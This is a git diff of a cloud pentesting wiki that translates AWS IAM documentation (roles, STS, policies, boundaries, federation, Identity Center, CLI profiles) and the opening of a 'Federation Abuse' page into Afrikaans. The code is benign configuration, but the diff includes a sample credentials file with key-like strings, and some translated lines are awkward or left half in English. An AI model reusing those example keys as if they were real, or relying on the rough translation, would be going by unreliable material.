-### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
+'n IAM **rol** is baie **soortgelyk** aan 'n **gebruiker**, in die sin dat dit 'n **identiteit met toestemmingbeleide is wat bepaal wat** dit kan en nie kan doen in AWS nie. egter, 'n rol **het nie enige geloofsbriewe** (wagwoord of toegang sleutels) wat daarmee geassosieer is nie. In plaas daarvan om uniek aan een persoon geassosieer te wees, is 'n rol bedoel om **aangenome te word deur enigeen wat dit nodig het (en genoeg perms het)**. 'n **IAM gebruiker kan 'n rol aanvaar om tydelik** verskillende toestemmings vir 'n spesifieke taak aan te neem. 'n rol kan **toegeken word aan 'n** [**gefedereerde gebruiker**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) wat aanmeld deur 'n eksterne identiteitsverskaffer te gebruik in plaas van IAM.
 
-An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
+'n IAM rol bestaan uit **twee tipes beleide**: 'n **vertrouensbeleid**, wat nie leeg kan wees nie, wat **definieer wie die rol kan aanvaar**, en 'n **toestemmingsbeleid**, wat nie leeg kan wees nie, wat **definieer wat dit kan toegang**.
 
-An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
+#### AWS Sekuriteits Token Diens (STS)
 
-#### AWS Security Token Service (STS)
+AWS Sekuriteits Token Diens (STS) is 'n webdiens wat die **uitreiking van tydelike, beperkte bevoegdhede** fasiliteer. Dit is spesifiek ontwerp vir:
 
-AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
+### [Tydelike geloofsbriewe in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
 
-### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
+**Tydelike geloofsbriewe word hoofsaaklik gebruik met IAM rolle**, maar daar is ook ander gebruike. Jy kan tydelike geloofsbriewe aan vra wat 'n meer beperkte stel toestemmings het as jou standaard IAM gebruiker. Dit **verhoed** dat jy **per ongeluk take uitvoer wat nie toegelaat word** deur die meer beperkte geloofsbriewe nie. 'n voordeel van tydelike geloofsbriewe is dat hulle outomaties verval na 'n bepaalde tydperk. Jy het beheer oor die duur waarvoor die geloofsbriewe geldig is.
 
-**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
+### Beleide
 
-### Policies
+#### Beleidstoestemmings
 
-#### Policy Permissions
+Word gebruik om toestemmings toe te ken. Daar is 2 tipes:
 
-Are used to assign permissions. There are 2 types:
-
-- AWS managed policies (preconfigured by AWS)
-- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
-
-By **default access** is **denied**, access will be granted if an explicit role has been specified.\
-If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
+- AWS bestuurde beleide (voorgeskrewe deur AWS)
+- Klant bestuurde beleide: Geconfigureer deur jou. Jy kan beleide skep gebaseer op AWS bestuurde beleide (een van hulle wysig en jou eie skep), deur die beleidgenerator te gebruik (n GUI-weergave wat jou help om toestemmings toe te ken en te weier) of jou eie te skryf.
 
+Deur **standaard toegang** is **weggeneem**, toegang sal toegestaan word as 'n eksplisiete rol gespesifiseer is.\
+As **enkele "Weier" bestaan, sal dit die "Toelaat" oorskry**, behalwe vir versoeke wat die AWS-rekening se wortel sekuriteitsgeloofsbriewe gebruik (wat standaard toegelaat word).
 ```javascript
 {
-    "Version": "2012-10-17",  //Version of the policy
-    "Statement": [  //Main element, there can be more than 1 entry in this array
-        {
-            "Sid": "Stmt32894y234276923" //Unique identifier (optional)
-            "Effect": "Allow", //Allow or deny
-            "Action": [  //Actions that will be allowed or denied
-                "ec2:AttachVolume",
-                "ec2:DetachVolume"
-            ],
-            "Resource": [ //Resource the action and effect will be applied to
-                "arn:aws:ec2:*:*:volume/*",
-                "arn:aws:ec2:*:*:instance/*"
-            ],
-            "Condition": { //Optional element that allow to control when the permission will be effective
-                "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
-            }
-        }
-    ]
+"Version": "2012-10-17",  //Version of the policy
+"Statement": [  //Main element, there can be more than 1 entry in this array
+{
+"Sid": "Stmt32894y234276923" //Unique identifier (optional)
+"Effect": "Allow", //Allow or deny
+"Action": [  //Actions that will be allowed or denied
+"ec2:AttachVolume",
+"ec2:DetachVolume"
+],
+"Resource": [ //Resource the action and effect will be applied to
+"arn:aws:ec2:*:*:volume/*",
+"arn:aws:ec2:*:*:instance/*"
+],
+"Condition": { //Optional element that allow to control when the permission will be effective
+"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
+}
+}
+]
 }
 ```
+Die [globale velde wat gebruik kan word vir voorwaardes in enige diens is hier gedokumenteer](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
+Die [spesifieke velde wat gebruik kan word vir voorwaardes per diens is hier gedokumenteer](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
 
-The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
-The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
+#### Inline Beleide
 
-#### Inline Policies
+Hierdie tipe beleide is **direk toegeken** aan 'n gebruiker, groep of rol. Dan verskyn hulle nie in die Beleide lys nie soos enige ander een kan hulle gebruik.\
+Inline beleide is nuttig as jy wil **'n streng een-tot-een verhouding tussen 'n beleid en die identiteit** wat dit toegepas word, handhaaf. Byvoorbeeld, jy wil seker maak dat die toestemmings in 'n beleid nie per ongeluk aan 'n identiteit anders as die een waarvoor hulle bedoel is, toegeken word nie. Wanneer jy 'n inline beleid gebruik, kan die toestemmings in die beleid nie per ongeluk aan die verkeerde identiteit geheg word nie. Boonop, wanneer jy die AWS Bestuurskonsol gebruik om daardie identiteit te verwyder, word die beleide wat in die identiteit ingebed is, ook verwyder. Dit is omdat hulle deel van die hoof entiteit is.
 
-This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
+#### Hulpbron Emmer Beleide
 
-#### Resource Bucket Policies
+Hierdie is **beleide** wat in **hulpbronne** gedefinieer kan word. **Nie alle hulpbronne van AWS ondersteun hulle nie**.
 
-These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
+As 'n hoof nie 'n eksplisiete weiering op hulle het nie, en 'n hulpbronbeleid hulle toegang gee, dan word hulle toegelaat.
 
-If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
+### IAM Grense
 
-### IAM Boundaries
+IAM grense kan gebruik word om **die toestemmings wat 'n gebruiker of rol toegang tot moet hê, te beperk**. Op hierdie manier, selfs al word 'n ander stel toestemmings aan die gebruiker toegeken deur 'n **ander beleid**, sal die operasie **misluk** as hy probeer om hulle te gebruik.
 
-IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
+'n Grens is net 'n beleid wat aan 'n gebruiker geheg is wat **die maksimum vlak van toestemmings wat die gebruiker of rol kan hê, aandui**. So, **selfs al het die gebruiker Administrateur toegang**, as die grens aandui dat hy slegs S· emmers kan lees, is dit die maksimum wat hy kan doen.
 
-A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do.
+**Dit**, **SCPs** en **die beginsel van die minste voorreg** is die maniere om te beheer dat gebruikers nie meer toestemmings het as wat hulle nodig het nie.
 
-**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
+### Sessie Beleide
 
-### Session Policies
-
-A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
-
-This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
+'n Sessie beleid is 'n **beleid wat ingestel word wanneer 'n rol aanvaar word** op een of ander manier. Dit sal soos 'n **IAM grens vir daardie sessie wees**: Dit beteken dat die sessie beleid nie toestemmings toeken nie, maar **beperk hulle tot diegene wat in die beleid aangedui word** (met die maksimum toestemmings wat die rol het).
 
+Dit is nuttig vir **veiligheidsmaatreëls**: Wanneer 'n admin 'n baie bevoorregte rol gaan aanvaar, kan hy die toestemming beperk tot slegs diegene wat in die sessie beleid aangedui word in die geval dat die sessie gecompromitteer word.
 ```bash
 aws sts assume-role \
-    --role-arn <value> \
-    --role-session-name <value> \
-    [--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
-    [--policy <file://policy.json>]
+--role-arn <value> \
+--role-session-name <value> \
+[--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
+[--policy <file://policy.json>]
 ```
+Note dat **AWS dalk sessiebeleide aan sessies kan voeg** wat gegenereer gaan word weens derde redes. Byvoorbeeld, in [nie-geverifieerde cognito aangeneemde rolle](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) sal AWS standaard (met verbeterde verifikasie) **sessie-akkrediteer met 'n sessiebeleid** genereer wat die dienste wat die sessie kan toegang hê, beperk [**tot die volgende lys**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
 
-Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
+As jy dus op 'n stadium die fout "… omdat geen sessiebeleid dit toelaat nie …" teëkom, en die rol toegang het om die aksie uit te voer, is dit omdat **daar 'n sessiebeleid is wat dit verhinder**.
 
-Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
+### Identiteitsfederasie
 
-### Identity Federation
+Identiteitsfederasie **laat gebruikers van identiteitsverskaffers wat eksterne** is tot AWS toe om AWS-hulpbronne veilig te benader sonder om AWS-gebruikersakkrediteer van 'n geldige IAM-gebruikersrekening te verskaf.\
+'n Voorbeeld van 'n identiteitsverskaffer kan jou eie korporatiewe **Microsoft Active Directory** (via **SAML**) of **OpenID** dienste (soos **Google**) wees. Gefedereerde toegang sal dan die gebruikers binne dit toelaat om AWS te benader.
 
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
-An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
+Om hierdie vertroue te konfigureer, word 'n **IAM Identiteitsverskaffer gegenereer (SAML of OAuth)** wat die **ander platform** sal **vertrou**. Dan word ten minste een **IAM rol (wat vertrou) aan die Identiteitsverskaffer toegeken**. As 'n gebruiker van die vertroude platform AWS benader, sal hy as die genoemde rol toegang hê.
 
-To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
+### IAM Identiteitsentrum
 
-However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
+AWS IAM Identiteitsentrum (opvolger van AWS Enkelteken) brei die vermoëns van AWS Identiteits- en Toegangsbestuur (IAM) uit om 'n **sentraal plek** te bied wat die **administrasie van gebruikers en hul toegang tot AWS** rekeninge en wolktoepassings saambring.
 
-<figure><img src="../../../images/image (247).png" alt=""><figcaption></figcaption></figure>
+Die aanmelddomein gaan iets soos `<user_input>.awsapps.com` wees.
 
-### IAM Identity Center
+Om gebruikers aan te meld, is daar 3 identiteitsbronne wat gebruik kan word:
 
-AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
+- Identiteitsentrum Gids: Gereelde AWS gebruikers
+- Aktiewe Gids: Ondersteun verskillende konnektore
+- Eksterne Identiteitsverskaffer: Alle gebruikers en groepe kom van 'n eksterne Identiteitsverskaffer (IdP)
 
-The login domain is going to be something like `<user_input>.awsapps.com`.
+In die eenvoudigste geval van die Identiteitsentrum gids, sal die **Identiteitsentrum 'n lys van gebruikers & groepe hê** en sal in staat wees om **beleide** aan hulle toe te ken vir **enige van die rekeninge** van die organisasie.
 
-To login users, there are 3 identity sources that can be used:
-
-- Identity Center Directory: Regular AWS users
-- Active Directory: Supports different connectors
-- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
-
-<figure><img src="../../../images/image (279).png" alt=""><figcaption></figcaption></figure>
-
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
-
-In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
+Om toegang aan 'n Identiteitsentrum gebruiker/groep tot 'n rekening te gee, sal 'n **SAML Identiteitsverskaffer wat die Identiteitsentrum vertrou, geskep word**, en 'n **rol wat die Identiteitsverskaffer met die aangeduide beleide vertrou, sal in die bestemmingsrekening geskep word**.
 
 #### AwsSSOInlinePolicy
 
-It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
+Dit is moontlik om **toestemmings via inline beleide aan rolle wat via IAM Identiteitsentrum geskep is, te gee**. Die rolle wat in die rekeninge geskep word wat **inline beleide in AWS Identiteitsentrum** ontvang, sal hierdie toestemmings in 'n inline beleid genaamd **`AwsSSOInlinePolicy`** hê.
 
-Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
+Daarom, selfs al sien jy 2 rolle met 'n inline beleid genaamd **`AwsSSOInlinePolicy`**, beteken dit **nie dat dit dieselfde toestemmings het nie**.
 
-### Cross Account Trusts and Roles
+### Kruisrekening Vertroue en Rolle
 
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
+**'n gebruiker** (wat vertrou) kan 'n Kruisrekening Rol met sommige beleide skep en dan **'n ander gebruiker** (wat vertrou) toelaat om **sy rekening te benader** maar slegs **met die toegang wat in die nuwe rolbeleide aangedui is**. Om dit te skep, skep eenvoudig 'n nuwe Rol en kies Kruisrekening Rol. Rolle vir Kruisrekening Toegang bied twee opsies. Om toegang te bied tussen AWS rekeninge wat jy besit, en om toegang te bied tussen 'n rekening wat jy besit en 'n derdeparty AWS rekening.\
+Dit word aanbeveel om **die gebruiker wat vertrou is spesifiek aan te dui en nie 'n generiese ding te plaas nie**, want anders kan ander geverifieerde gebruikers soos gefedereerde gebruikers ook hierdie vertroue misbruik.
 
-### AWS Simple AD
+### AWS Eenvoudige AD
 
-Not supported:
+Nie ondersteun nie:
 
-- Trust Relations
-- AD Admin Center
-- Full PS API support
-- AD Recycle Bin
-- Group Managed Service Accounts
-- Schema Extensions
-- No Direct access to OS or Instances
+- Vertrouensverhoudings
+- AD Admin Sentrum
+- Volledige PS API ondersteuning
+- AD Herwinningsblik
+- Groep Gemanagte Diensrekeninge
+- Skema-uitbreidings
+- Geen Direkte toegang tot OS of Instansies nie
 
-#### Web Federation or OpenID Authentication
+#### Web Federasie of OpenID Verifikasie
 
-The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
+Die toepassing gebruik die AssumeRoleWithWebIdentity om tydelike akkrediteer te skep. Dit gee egter nie toegang tot die AWS-konsol nie, net toegang tot hulpbronne binne AWS.
 
-### Other IAM options
+### Ander IAM opsies
 
-- You can **set a password policy setting** options like minimum length and password requirements.
-- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
+- Jy kan **'n wagwoordbeleid instelling** opsies soos minimum lengte en wagwoordvereistes stel.
+- Jy kan **"Akkrediteer Verslag" aflaai** met inligting oor huidige akkrediteer (soos gebruikers skeppingstyd, is wagwoord geaktiveer...). Jy kan 'n akkrediteer verslag genereer so dikwels as een keer elke **vier uur**.
 
-AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
+AWS Identiteits- en Toegangsbestuur (IAM) bied **fyn-graad toegangbeheer** oor al die AWS. Met IAM kan jy spesifiseer **wie toegang het tot watter dienste en hulpbronne**, en onder watter omstandighede. Met IAM beleide bestuur jy toestemmings aan jou werksmag en stelsels om **minste-bevoegdheidstoestemmings** te verseker.
 
-### IAM ID Prefixes
+### IAM ID Vooraf
 
-In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
+In [**hierdie bladsy**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) kan jy die **IAM ID vooraf** van sleutels vind, afhangende van hul aard:
 
-| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html)                                                                                                          |
+| ABIA | [AWS STS diens draer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html)                                                                                                          |
 | ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ACCA | Context-specific credential                                                                                                                                                                                          |
-| AGPA | User group                                                                                                                                                                                                           |
-| AIDA | IAM user                                                                                                                                                                                                             |
-| AIPA | Amazon EC2 instance profile                                                                                                                                                                                          |
-| AKIA | Access key                                                                                                                                                                                                           |
-| ANPA | Managed policy                                                                                                                                                                                                       |
-| ANVA | Version in a managed policy                                                                                                                                                                                          |
-| APKA | Public key                                                                                                                                                                                                           |
-| AROA | Role                                                                                                                                                                                                                 |
-| ASCA | Certificate                                                                                                                                                                                                          |
-| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
+| ACCA | Konteks-spesifieke akkrediteer                                                                                                                                                                                          |
+| AGPA | Gebruikersgroep                                                                                                                                                                                                           |
+| AIDA | IAM gebruiker                                                                                                                                                                                                             |
+| AIPA | Amazon EC2 instansieprofiel                                                                                                                                                                                          |
+| AKIA | Toegangssleutel                                                                                                                                                                                                           |
+| ANPA | Gemanagte beleid                                                                                                                                                                                                       |
+| ANVA | Weergawe in 'n gemanagte beleid                                                                                                                                                                                          |
+| APKA | Publieke sleutel                                                                                                                                                                                                           |
+| AROA | Rol                                                                                                                                                                                                                 |
+| ASCA | Sertifikaat                                                                                                                                                                                                          |
+| ASIA | [Tydelike (AWS STS) toegangssleutel ID's](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) gebruik hierdie vooraf, maar is uniek slegs in kombinasie met die geheime toegangssleutel en die sessietoken. |
 
-### Recommended permissions to audit accounts
+### Aanbevole toestemmings om rekeninge te oudit
 
-The following privileges grant various read access of metadata:
+Die volgende voorregte bied verskeie lees toegang van metadata:
 
 - `arn:aws:iam::aws:policy/SecurityAudit`
 - `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
@@ -336,14 +318,13 @@ The following privileges grant various read access of metadata:
 - `directconnect:DescribeConnections`
 - `dynamodb:ListTables`
 
-## Misc
+## Verskeie
 
-### CLI Authentication
-
-In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
-In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
-Example of credentials file with more than 1 profile:
+### CLI Verifikasie
 
+Om 'n gereelde gebruiker te laat verifieer by AWS via CLI, moet jy **lokale akkrediteer** hê. Standaard kan jy dit **handmatig** in `~/.aws/credentials` konfigureer of deur **te loop** `aws configure`.\
+In daardie lêer kan jy meer as een profiel hê, as **geen profiel** gespesifiseer word met die **aws cli**, sal die een genaamd **`[default]`** in daardie lêer gebruik word.\
+Voorbeeld van akkrediteer lêer met meer as 1 profiel:
 ```
 [default]
 aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
@@ -354,12 +335,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
 aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
 region = eu-west-2
 ```
-
 If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`) and configure the credentials.
 
-You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
+You can use the `~/.aws/config` file to[ **aandui watter rolle om aan te neem**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
 A config file example:
-
 ```
 [profile acc2]
 region=eu-west-2
@@ -368,23 +347,16 @@ role_session_name = <session_name>
 source_profile = <profile_with_assume_role>
 sts_regional_endpoints = regional
 ```
-
-With this config file you can then use aws cli like:
-
+Met hierdie konfigurasie-lêer kan jy dan aws cli gebruik soos:
 ```
 aws --profile acc2 ...
 ```
+As jy op soek is na iets **soortgelyks** soos dit, maar vir die **blaaier**, kan jy die **uitbreiding** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en) kyk.
 
-If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
 - [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
 - [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
index 73ae6b448..0af0dde30 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -1,87 +1,84 @@
-# AWS - Federation Abuse
+# AWS - Federasie Misbruik
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## SAML
 
-For info about SAML please check:
+Vir inligting oor SAML, kyk asseblief:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/saml-attacks
 {{#endref}}
 
-In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
+Om 'n **Identiteitsfederasie deur SAML** te konfigureer, moet jy net 'n **naam** en die **metadata XML** wat al die SAML-konfigurasie bevat (**eindpunte**, **sertifikaat** met publieke sleutel) verskaf.
 
-## OIDC - Github Actions Abuse
+## OIDC - Github Aksies Misbruik
 
-In order to add a github action as Identity provider:
-
-1. For _Provider type_, select **OpenID Connect**.
-2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
-3. Click on _Get thumbprint_ to get the thumbprint of the provider
-4. For _Audience_, enter `sts.amazonaws.com`
-5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
-   - ```json
-     {
-       "Version": "2012-10-17",
-       "Statement": [
-         {
-           "Effect": "Allow",
-           "Principal": {
-             "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
-           },
-           "Action": "sts:AssumeRoleWithWebIdentity",
-           "Condition": {
-             "StringEquals": {
-               "token.actions.githubusercontent.com:sub": [
-                 "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
-                 "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
-               ],
-               "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
-             }
-           }
-         }
-       ]
-     }
-     ```
-6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
-7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
-8. Finally use a github action to configure the AWS creds to be used by the workflow:
+Om 'n github aksie as Identiteitsverskaffer by te voeg:
 
+1. Vir _Verskaffer tipe_, kies **OpenID Connect**.
+2. Vir _Verskaffer URL_, voer `https://token.actions.githubusercontent.com` in.
+3. Klik op _Kry duimafdruk_ om die duimafdruk van die verskaffer te kry.
+4. Vir _Teiken_, voer `sts.amazonaws.com` in.
+5. Skep 'n **nuwe rol** met die **toestemmings** wat die github aksie benodig en 'n **vertrouensbeleid** wat die verskaffer vertrou soos:
+- ```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:sub": [
+"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
+"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
+],
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
+}
+```
+6. Let op in die vorige beleid hoe slegs 'n **tak** van 'n **bewaarplek** van 'n **organisasie** gemagtig was met 'n spesifieke **trigger**.
+7. Die **ARN** van die **rol** wat die github aksie gaan kan **naboots**, gaan die "geheime" wees wat die github aksie moet weet, so **stoor** dit binne 'n **geheim** binne 'n **omgewing**.
+8. Laastens, gebruik 'n github aksie om die AWS kredensiale te konfigureer wat deur die werksvloei gebruik gaan word:
 ```yaml
 name: "test AWS Access"
 
 # The workflow should only trigger on pull requests to the main branch
 on:
-  pull_request:
-    branches:
-      - main
+pull_request:
+branches:
+- main
 
 # Required to get the ID Token that will be used for OIDC
 permissions:
-  id-token: write
-  contents: read # needed for private repos to checkout
+id-token: write
+contents: read # needed for private repos to checkout
 
 jobs:
-  aws:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
+aws:
+runs-on: ubuntu-latest
+steps:
+- name: Checkout
+uses: actions/checkout@v3
 
-      - name: Configure AWS Credentials
-        uses: aws-actions/configure-aws-credentials@v1
-        with:
-          aws-region: eu-west-1
-          role-to-assume:${{ secrets.READ_ROLE }}
-          role-session-name: OIDCSession
+- name: Configure AWS Credentials
+uses: aws-actions/configure-aws-credentials@v1
+with:
+aws-region: eu-west-1
+role-to-assume:${{ secrets.READ_ROLE }}
+role-session-name: OIDCSession
 
-      - run: aws sts get-caller-identity
-        shell: bash
+- run: aws sts get-caller-identity
+shell: bash
 ```
-
-## OIDC - EKS Abuse
-
+## OIDC - EKS Misbruik
 ```bash
 # Crate an EKS cluster (~10min)
 eksctl create cluster --name demo --fargate
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate
 # Create an Identity Provider for an EKS cluster
 eksctl utils associate-iam-oidc-provider --cluster Testing --approve
 ```
-
-It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
-
